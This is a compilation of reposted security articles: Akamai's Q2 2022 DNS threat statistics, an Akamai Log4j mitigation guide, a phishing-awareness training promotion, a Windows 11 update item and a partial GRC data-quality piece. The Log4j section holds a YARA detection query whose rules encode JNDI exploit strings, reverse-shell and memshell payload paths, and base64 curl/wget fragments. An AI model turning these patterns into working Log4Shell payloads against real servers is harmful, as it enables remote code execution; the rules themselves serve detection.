Akamai’s Insights on DNS in Q2 2022

by Or Katz and Jim Black
Data analysis by Gal Kochner and Moshe Cohen

Executive summary

  • Akamai researchers have analyzed malicious DNS traffic from millions of devices to determine how corporate and personal devices are interacting with malicious domains, including phishing attacks, malware, ransomware, and command and control (C2).
  • Akamai researchers saw that 12.3% of devices used by home and corporate users communicated at least once to domains associated with malware or ransomware.
  • 63% of those users’ devices communicated with malware or ransomware domains, 32% communicated with phishing domains, and 5% communicated with C2 domains.
  • Digging further into phishing attacks, researchers found that users of financial services and high tech are the most frequent targets of phishing campaigns, with 47% and 36% of the victims, respectively.
  • Consumer accounts are the most affected by phishing, with 80.7% of the attack campaigns.
  • Tracking 290 different phishing toolkits being reused in the wild, and counting the number of distinct days each kit was reused over Q2 2022, shows that 1.9% of the tracked kits were reactivated on at least 72 days. In addition, 49.6% of the kits were reused for at least five days, demonstrating how many users are being revictimized multiple times. This shows how realistic-looking and dangerous these kits can be, even to knowledgeable users. 
  • The most used phishing toolkit in Q2 2022 (Kr3pto, a phishing campaign that targeted banking customers in the United Kingdom, which evades multi-factor authentication [MFA]) was hosted on more than 500 distinct domains.

Introduction

“It’s always DNS.” Although that is a bit of a tongue-in-cheek phrase in our industry, DNS can give us a lot of information about the threat landscape that exists today. By analyzing information from Akamai’s massive infrastructure, we are able to gain some significant insights on how the internet behaves. In this blog, we will explore these insights into traffic patterns, and how they affect people on the other end of the internet connection. 

Akamai traffic insights

Attacks by category

Based on Akamai’s range of visibility across different industries and geographies, we can see that 12.3% of protected devices attempted to reach out to domains that were associated with malware at least once during Q2 2022. This indicates that these devices might have been compromised. On the phishing and C2 front, we can see that 6.2% of devices accessed phishing domains and 0.8% of the devices accessed C2-associated domains. Although these numbers may seem insignificant, the scale here is in the millions of devices. When this is considered, along with the knowledge that C2 is the most malignant of threats, these numbers are not only significant, they’re cardinal.

Comparing 2022 Q2 results with 2022 Q1 results (Figure 1), we can see a minor increase in all categories in Q2. We attribute those increases to seasonal changes that are not associated with a significant change in the threat landscape.

Fig. 1: Devices exposed to threats — Q1 vs. Q2 Fig. 1: Devices exposed to threats — Q1 vs. Q2

In Figure 2, we can see that of the 12.3% potentially compromised devices, 63% were exposed to threats associated with malware activity, 32% with phishing, and 5% with C2. Access to malware-associated domains does not guarantee that these devices were actually compromised, but provides a strong indication of increased potential risk if the threat wasn’t properly mitigated. However, access to C2-associated domains indicates that the device is most likely compromised and is communicating with the C2 server. This can often explain why the incidence of C2 is lower when compared with malware numbers.

Fig. 2: Potentially compromised devices by category Fig. 2: Potentially compromised devices by category

Phishing attack campaigns 

By looking into the brands that are being abused and mimicked by phishing scams in Q2 2022, categorized by brand industry and number of victims, we can see that high tech and financial brands led with 36% and 47%, respectively (Figure 3). These leading phishing industry categories are consistent with Q1 2022 results, in which high tech and financial brands were the leading categories, with 32% and 31%, respectively. 

Fig. 3: Phishing victims and phishing campaigns by abused brands Fig. 3: Phishing victims and phishing campaigns by abused brands

When taking a different view on the phishing landscape–targeted industries by counting the number of attack campaigns being launched over Q2 2022, we can see that high tech and financial brands are still leading, with 36% and 41%, respectively (Figure 3). The correlation between leading targeted brands when it comes to number of attacks and number of victims is evidence that threat actors’ efforts and resources are, unfortunately, effectively working to achieve their desired outcome.

Akamai’s research does not have any visibility into the distribution channels used to deliver the monitored phishing attacks that led to victims clicking on a malicious link and ending up on the phishing landing page. Yet the strong correlation between different brand segments by number of attack campaigns and the number of victims seems to indicate that the volume of attacks is effective and leads to a similar trend in the number of victims. The correlation might also indicate that the distribution channels used have minimal effect on attack outcome, and it is all about the volume of attacks that lead to the desired success rates.

Taking a closer look at phishing attacks by categorization of attack campaigns — consumers vs. business targeted accounts— we can see that consumer attacks are the most dominant, with 80.7% of the attack campaigns (Figure 4). This domination is driven by the massive demand for consumers’ compromised accounts in dark markets that are then used to launch fraud-related second-phase attacks. However, even with only 19.3% of the attack campaigns, attacks against business accounts should not be considered marginal, as these kinds of attacks are usually more targeted and have greater potential for significant damage. Attacks that target business accounts may lead to a company’s network being compromised with malware or ransomware, or to confidential information being leaked. An attack that begins with an employee clicking a link in a phishing email can end up with the business suffering significant financial and reputational damages.

Fig. 4: Phishing targeted accounts — consumers vs. business  Fig. 4: Phishing targeted accounts — consumers vs. business

Phishing toolkits 

Phishing attacks are an extremely common vector that have been used for many years. The potential impacts and risks involved are well-known to most internet users. However, phishing is still a highly relevant and dangerous attack vector that affects thousands of people and businesses daily. Research conducted by Akamai explains some of the reasons for this phenomenon, and focuses on the phishing toolkits and their role in making phishing attacks effective and relevant. 

Phishing toolkits enable rapid and easy creation of fake websites that mimic known brands. Phishing toolkits enable even non–technically gifted scammers to run phishing scams, and in many cases are being used to create distributed and large-scale attack campaigns. The low cost and availability of these toolkits explains the increasing numbers of phishing attacks that have been seen in the past few years. 

According to Akamai’s research that tracked 290 different phishing toolkits being used in the wild, 1.9% of the tracked kits were reused on at least 72 distinct days over Q2 2022 (Figure 5). Further, 49.6% of the kits were reused for at least five days, and when looking into all the tracked kits, we can see that all of them were reused no fewer than three distinct days over Q2 2022.

Fig. 5: Phishing toolkits by number of reused days Q2 2022 Fig. 5: Phishing toolkits by number of reused days Q2 2022

The numbers showing the heavy reuse phenomenon of the observed phishing kits shed some light on the phishing threat landscape and the scale involved, creating an overwhelming challenge to defenders. Behind the reuse of phishing kits are factories and economic forces that drive the phishing landscape. Those forces include developers who create phishing kits that mimic known brands, later to be sold or shared among threat actors to be reused over and over again with very minimal effort.

Further analysis on the most reused kits in Q2 2022, counting the number of different domains used to deliver each kit, shows that the Kr3pto toolkit was the one most frequently used and was associated with more than 500 domains (Figure 6). The tracked kits are labeled by the name of the brand being abused or by a generic name representing the kit developer signature or kit functionality.

In the case of Kr3pto, the actor behind the phishing kit is a developer who builds and sells unique kits that target financial institutions and other brands. In some cases, these kits target financial firms in the United Kingdom, and they bypass MFA. This evidence also shows that this phishing kit that was initially created more than three years ago is still highly active and effective and being used intensively in the wild.

Fig. 6: Top 10 reused phishing toolkits  Fig. 6: Top 10 reused phishing toolkits

The phishing economy is growing, kits are becoming easier to develop and deploy, and the web is full of abandoned, ready-to-be-abused websites and vulnerable servers and services. Criminals capitalize on these weaknesses to establish a foothold that enables them to victimize thousands of people and businesses daily.

The growing industrial nature of phishing kit development and sales (in which new kits are developed and released within hours) and the clear split between creators and users means this threat isn’t going anywhere anytime soon. The threat posed by phishing factories isn’t just focused on the victims who risk having valuable accounts compromised and their personal information sold to criminals — phishing is also a threat to brands and their stakeholders.

The life span of a typical phishing domain is measured in hours, not days. Yet new techniques and developments by the phishing kit creators are expanding these life spans little by little, and it’s enough to keep the victims coming and the phishing economy moving. 

Summary

This type of research is necessary in the fight to keep our customers safer online. We will continue to monitor these threats and report on them to keep the industry informed.

The best way to stay up to date on this and other research pieces from the Akamai team is to follow Akamai Security Research on Twitter.

Source :
https://www.akamai.com/blog/security-research/q2-dns-akamai-insights

Mitigating Log4j Abuse Using Akamai Guardicore Segmentation

Executive summary

A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that’s used widely in applications, including many utilized by large enterprise organizations.

The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There already are reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.

Akamai Guardicore Segmentation is well positioned to address this vulnerability in different ways. It’s highly recommended that organizations update Log4j to its latest version- 2.16.0. Due to the rapidly escalating nature of this vulnerability, Akamai teams will continue to develop and deploy mitigation measures in order to support our customers.

As a follow up to Akamai’s recent post we wanted to provide more detail on how organizations can leverage  Akamai Guardicore Segmentation features to help address log4j exposure.

Log4j vulnerability: scope and impact

Log4j is a Java-based open-source logging library. On December 9, 2021, a critical vulnerability involving unauthenticated remote code execution (CVE-2021-44228) in Log4j was reported, causing concern due to how commonly Log4j is used. In addition to being used directly in a large multitude of applications, Log4j is also incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.

Although Akamai first observed exploit attempts on the Log4j vulnerability on December 9th, following the widespread publication of the incident, we are now seeing evidence suggesting it could have been around for months. Since widespread publication of the vulnerability, we have seen multiple variants seeking to exploit this vulnerability, at a sustained volume of attack traffic at around 2M exploit requests per hour. The speed at which the variants are evolving is unprecedented.

A compromised machine would allow a threat actor to remotely provide a set of commands which Log4j executes. An attacker would have the ability to run arbitrary commands inside a server. This can allow an attacker to compromise a vulnerable system – including those that might be secured deep inside of a network with no direct access to the internet.

Akamai’s security teams have been monitoring attackers attempting to use Log4j in recent days. Other than the increase in attempted exploitation, Akamai researchers are also seeing attackers using a multitude of tools and attack techniques to get vulnerable components to log malicious content, in order to get remote code execution. This is indicative of threat actors’ ability to exploit a new vulnerability, and the worse the vulnerability is, the quicker they will act.

Mitigating Log4j abuse using Akamai Guardicore Segmentation

Customers using Akamai Guardicore Segmentation can leverage its deep, process level visibility to identify vulnerable applications and potential security risks in the environment. They can then use it to enact precise control over network traffic in order to stop attempted attacks on vulnerable systems, without disruptions to normal business operations. 

Guardicore Hunt customers have their environments monitored and investigated continuously by a dedicated team of security researchers. Alerts on security risks and suggested mitigation steps are immediately sent.

If you’d like to hear more about Akamai Guardicore Segmentation, read more or contact us.

What’s under threat: identify vulnerable Java processes and Log4j abuse

In order to protect against potential Log4j abuse, it is necessary to first identify potentially exploitable processes. This requires deep visibility into network traffic at the process level, which is provided by the Reveal and Insight features of Akamai Guardicore Segmentation. Precise visibility into internet connections and traffic at the process level allows us to see clearly what mitigation steps need to be taken, and visibility tools with historical data are pivotal in helping to prevent disruption to business operations.

Identify internet connected Java applications: using Reveal Explore Map, create a map for the previous week, and filter by java applications- such as tomcat, elastic, logstash- and by applications that have connections to/from the internet. Using this map, you can now see which assets are under potential threat. While this won’t yet identify Log4j applications, this can give you an idea of which machines to prioritize in your mitigation process.

Create a historical map to analyze normal communication patterns: using Reveal Explore Map, create a historical map of previous weeks (excluding the time since Log4j was reported) to view and learn normal communication patterns. Use this information to identify legitimate communications, and respond without disrupting the business. For example, a historical map might indicate what network connections exist under normal circumstances, those could be allowed, while other connections blocked or alerted on. Additionally, compare and contrast with a more recent map to identify anomalies.

Use reveal explore map to identify legitimate communications, and respond without disrupting the business.

Identify applications vulnerable to Log4j abuse: in the query section below, use Query 1 with Insight queries to identify assets that are running Java applications which have Log4j jar files in their directories. This query should return all Log4j packages in your environment, allowing you to assess and address any mitigation steps needed. To better prioritize exposed machines, cross reference the information with the Reveal Explore Map described previously.

Note that this query identifies Log4j packages that exist in the Java process current working directory or sub-directories.

Detect potential exploitation attempts in Linux logs: run an Insight query using YARA signature rule (Query 2, provided below in the query section) to search for known Log4j IoCs in the logs of linux machines. This can help you identify whether you’ve been attacked.

Note, a negative result does not necessarily mean that no attack exists, as this is only one of many indicators.

Stopping the attack: using Guardicore Segmentation to block malicious IoCs and attack vectors

It is imperative to be able to take action, once vulnerable applications have been identified. While patching is underway, Akamai Guardicore Segmentation offers a multitude of options for alerting on, stopping and preventing potential attacks. Critically, a solution with detailed and precise control over network communication and traffic is required to be able to surgically block or isolate attack vectors, with minimal to no disruption to normal business functions.

Automatically block IoC’s with Threat Intelligence Firewall (TIFW) and DNS Security: Akamai security teams are working around the clock to identify IPs and Domains used for Log4j exploitation. Customers who have these features turned on can expect a constantly updated list of IoCs to be blocked, preventing Log4j being used to download malicious payloads. Note that TIFW can be set to alert or block, please ensure it’s configured correctly. DNS Security is available from V41 onwards. The IoCs are also available on the Guardicore Threat Intel Repository and Guardicore Reputation Service.

Fully quarantine compromised servers: if compromised machines are identified during your investigation, use Akamai Guardicore Segmentation to isolate attacked/vulnerable servers from the rest of your network. Leverage built-in templates to easily enable deployment of segmentation policy to mitigate attacks.

Block inbound and outbound traffic to vulnerable assets: as a precautionary measure, you may also choose to block traffic to all machines identified with an unpatched version of Log4j, until patching is completed. Using a historical map of network traffic can help you limit the impact on business operations.

Create block rules for outgoing traffic from Java applications to the internet: if necessary, all internet-connected Java applications revealed in previous steps can be blocked from accessing the internet, as an additional precaution, until patching is complete.

Search queries

Query 1: To Identify assets that are running Java applications, which also have a Log4j jar file under their directories, run the following Insight query:

This query identifies assets that are running Java applications, which also have a Log4j jar file under their directories.

Query 2: To detect potential exploitation attempts, run an Insight query using YARA signature rules (our thanks to Florian Roth who published the original rule): 

SELECT path, count FROM yara WHERE path LIKE '/var/log/%%' AND sigrule = "rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
strings:
$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
condition:
1 of them
}
rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
strings:
$ = {22 2F 42 61 73 69 63 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 42 61 73 69 63 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 42 61 73 69 63 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 65 74 74 79 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 6C 6F 67 69 63 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 42 6F 73 73 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 73 70 68 65 72 65 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 55 52 4C 44 4E 53 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 31 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 32 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 42 65 61 6E 75 74 69 6C 73 31 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 4A 72 65 38 75 32 30 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 47 72 6F 6F 76 79 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 57 65 62 73 70 68 65 72 65 42 79 70 61 73 73 2F 55 70 6C 6F 61 64 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
strings:
$xa1 = {22 68 65 61 64 65 72 20 77 69 74 68 20 76 61 6C 75 65 20 6F 66 20 42 61 64 41 74 74 72 69 62 75 74 65 56 61 6C 75 65 45 78 63 65 70 74 69 6F 6E 3A 20 22}




$sa1 = {22 2E 6C 6F 67 34 6A 2E 63 6F 72 65 2E 6E 65 74 2E 4A 6E 64 69 4D 61 6E 61 67 65 72 2E 6C 6F 6F 6B 75 70 28 4A 6E 64 69 4D 61 6E 61 67 65 72 22}
$sa2 = {22 45 72 72 6F 72 20 6C 6F 6F 6B 69 6E 67 20 75 70 20 4A 4E 44 49 20 72 65 73 6F 75 72 63 65 22}
condition:
$xa1 or all of ($sa*)
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
strings:
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 72 6D 69 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 64 6E 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 69 69 6F 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 68 74 74 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 69 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 64 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 63 6F 72 62 61 3A 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
strings:
$x1 = {22 24 25 37 42 6A 6E 64 69 3A 22}
$x2 = {22 25 32 35 32 34 25 32 35 37 42 6A 6E 64 69 22}
$x3 = {22 25 32 46 25 32 35 32 35 32 34 25 32 35 32 35 37 42 6A 6E 64 69 25 33 41 22}
$x4 = {22 24 7B 6A 6E 64 69 3A 24 7B 6C 6F 77 65 72 3A 22}
$x5 = {22 24 7B 3A 3A 2D 6A 7D 24 7B 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
strings:
$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
condition:
$x1 and not 1 of ($fp*)
}
rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
strings:
/* curl -s */
$sa1 = {22 59 33 56 79 62 43 41 74 63 79 22}
$sa2 = {22 4E 31 63 6D 77 67 4C 58 4D 67 22}
$sa3 = {22 6A 64 58 4A 73 49 43 31 7A 49 22}
/* |wget -q -O- */
$sb1 = {22 66 48 64 6E 5A 58 51 67 4C 58 45 67 4C 55 38 74 49 22}
$sb2 = {22 78 33 5A 32 56 30 49 43 31 78 49 43 31 50 4C 53 22}
$sb3 = {22 38 64 32 64 6C 64 43 41 74 63 53 41 74 54 79 30 67 22}
condition:
1 of ($sa*) and 1 of ($sb*)
}
rule SUSP_JDNIExploit_Indicators_Dec21 {
strings:
$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
condition:
filesize < 100MB and $xr1
}
rule SUSP_EXPL_OBFUSC_Dec21_1{
strings:
/* ${lower:X} - single character match */
$ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
/* ${upper:X} - single character match */
$ = { 24 7B 75 70 70 65 72 3A ?? 7D }
/* URL encoded lower - obfuscation in URL */
$ = {22 24 25 37 62 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 62 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 62 6A 6E 64 69 3A 22}
$ = {22 24 25 37 42 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 42 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 42 6A 6E 64 69 3A 22}
condition:
1 of them
}"
AND count > 0 AND path NOT LIKE "/var/log/gc%"

Source :
https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of the U.S. is considering quitting their jobs. This trend – coined the great resignation – creates instability in organizations. High employee turnover increases security risks, and companies are more vulnerable to attacks from human factors worldwide.

At Davos 2022, statistics connect the turmoil of the great resignation to the rise of new insider threats. Security teams are feeling the impact. It’s even harder to keep up with your employee security. Companies need a fresh approach to close the gaps and prevent attacks. This article will examine what your security teams must do within the new organizational dynamics to quickly and effectively address unique challenges.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team—the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behavior, and ways of work. Changing habits is slow. Yet, companies don’t have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization’s security high-impact risks:

  • Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
  • Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
  • Ensure friendly reminders – With less staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
  • Support remote work –To support rapid employee recruitment, working at home is a must. Remote work flexibility helps to attract and retain new employees.
  • Train on the go – Remote work requires securing remote devices and dealing with new employee behavior for inherent distractions – on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts within the high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff. It must genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present. All employees are needed to protect against sophisticated phishing threats. It’s even more complicated in the great resignation. With new weak links, your company is at the greatest risk. Gullible employees leave security ‘holes’ in your organization’s front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

  • Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
  • Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
  • Raise employee awareness of threats.
  • Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren’t enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty. Create a foundation. Continually promote learning to the next level. You must understand and cater to your employee’s needs and way of work for effectiveness.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

  • Adjust your training simulations to employee contexts and frequency for mastery.
  • Set difficulty level depending on employee behavior and results.
  • Use intensive, bite-size intervals for success.
  • By varying attack scenarios, new employees get proper onboarding.
  • Put security on the top of the mind of all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

  • Build custom high-intensity training campaigns for your high-risk groups.
  • Focus on specific challenges for concrete results like:

1) Password and data requests

2) Messages from seemingly legitimate senders and sources

3) Realistic content tailored to a specific department or role.

  • Adapt your training for both individuals and attack vectors while respecting employee privacy.
  • Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the great resignation. It’s more important than ever for every employee to get up to speed for high cyber resilience quickly.

Download the CybeReady Playbook to learn how CybeReady’s fully automated security awareness training platform provides the fast, concrete results you need with virtually zero effort IT, or schedule a product demo with one of our experts.

Source :
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

Windows 11 KB5017328 update fixes USB printing, audio headset issues

Microsoft has released the Windows 11 KB5017328 cumulative update with security updates and improvements, including USB printing and Bluetooth headsets fixes.

KB5017328 is a mandatory cumulative update containing the September 2022 Patch Tuesday security updates for vulnerabilities discovered in previous months.

Windows 11 KB5017328 cumulative update
Windows 11 KB5017328 cumulative update

Windows 11 users can install today’s update by going to Start Settings > Windows Update and clicking on ‘Check for Updates.’

Windows 11 users can also manually download and install the KB5017328 preview update from the Microsoft Update Catalog.

What’s new in the Windows 11 KB5017328 update

After installing today’s non-security update, Windows 11 will have its build number changed to 22000.978.

The Windows 11 KB5017328 cumulative update includes approximately 25 improvements and fixes, with the highlighted fixes listed below:

  • USB printers that might have malfunctioned when you restarted your device or reinstalled them now work as expected.
  • Microsoft fixed a Windows 11 SE that displayed trust errors when attempting to install apps from the Microsoft Store.
  • Microsoft fixed an issue where Bluetooth audio headsets stopped playing audio after adjusting the progress bar.
  • Microsoft addressed a Microsoft Edge IE mode issue that prevented users from interacting with dialog boxes.
  • Fixed a bug that prevented Windows from displaying Microsoft account (MSA) login forms after installing the  KB5016691 update.

In addition to these issues, Microsoft also fixed eighteen other bugs, as explained in the August KB5016691 preview update.

Related Articles:

Windows 11 KB5016691 preview update released with 22 changes

Windows 11 KB5016629 update fixes Start Menu, File Explorer issues

Windows 11 KB5015882 update fixes bugs causing File Explorer to freeze

Microsoft September 2022 Patch Tuesday fixes zero-day used in attacks, 63 flaws

Windows 10 KB5017308 and KB5017315 updates released

Source:
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5017328-update-fixes-usb-printing-audio-headset-issues/

How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliable the information serves an organization’s specific needs — mainly supporting decision-making.

Some of these needs might be:

  • Operations – Where and how can we be more efficient?
  • Resource distribution – Do we have any excess? Where? And why?
  • Planning – How likely is this scenario to occur? What can we do about it?
  • Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

  • Consistency
  • Accuracy
  • Validity
  • Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

  • Completeness: The expected data to make decisions is present.
  • Uniqueness: There is no duplication of data.
  • Timeliness: The data is up-to-date and available to use when needed.
  • Validity: The information has the proper format and matches the requirements.
  • Accuracy: The data describes the object correctly in a real-world context.
  • Consistency: The data must be the same across multiple databases

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls to avoid mistakes, standardize tasks and guide personnel when collecting and dealing with vital information.

GRC helps organizations answer the following questions:

  • How is the company ensuring that data is available for internal decision and for the clients?
  • Is everyone taking the proper steps to collect and process data?
  • Have redundancies been removed?
  • Is the organization prepared for unexpected events?
  • Does the organization have a backup system?
  • Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

